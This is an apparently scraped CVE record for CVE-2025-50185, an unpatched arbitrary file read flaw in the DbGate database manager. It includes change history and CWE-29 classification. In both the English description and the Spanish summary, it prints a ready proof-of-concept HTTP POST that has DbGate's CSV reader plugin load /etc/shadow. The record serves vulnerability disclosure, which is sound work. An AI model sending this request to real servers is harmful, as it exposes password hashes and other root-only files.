CVE-2025-50185

DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue. ``` POST /runners/load-reader HTTP/1.1 Host: <REPLACE ME> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: <REPLACE ME> Content-Type: application/json Authorization: Bearer <REPLACE ME> Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie: <REPLACE ME> Priority: u=0 Cache-Control: max-age=0 {"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}} ``` The request payload: ![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a) Lines of the file being returned: ![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)
CVSS

No CVSS.

Configurations

No configuration.

History

29 Jul 2025, 14:14

Type Values Removed Values Added
Summary
  • (es) DbGate es un gestor de bases de datos multiplataforma. En las versiones 6.6.0 y anteriores, DbGate permite el acceso no autorizado a archivos debido a una validación insuficiente de las rutas y los tipos de archivo. Un usuario con acceso a nivel de aplicación puede recuperar datos de archivos arbitrarios en el sistema, independientemente de su ubicación o tipo de archivo. El complemento no realiza las comprobaciones adecuadas del tipo de contenido y la extensión del archivo antes de leerlo. Como resultado, incluso archivos confidenciales accesibles solo para el usuario root pueden leerse a través de la interfaz de la aplicación. Actualmente no hay solución para este problema.``` POST /runners/load-reader HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Authorization: Bearer Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie: Priority: u=0 Cache-Control: max-age=0 {"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}} ``` The request payload: ![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a) Lines of the file being returned: ![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)

28 Jul 2025, 19:15

Type Values Removed Values Added
References () https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9 - () https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9 -

26 Jul 2025, 04:16

Type Values Removed Values Added
New CVE

Information

Published : 2025-07-26 04:16

Updated : 2025-07-29 14:14


NVD link : CVE-2025-50185

Mitre link : CVE-2025-50185

CVE.ORG link : CVE-2025-50185


JSON object : View

Products Affected

No product.

CWE
CWE-29

Path Traversal: '\..\filename'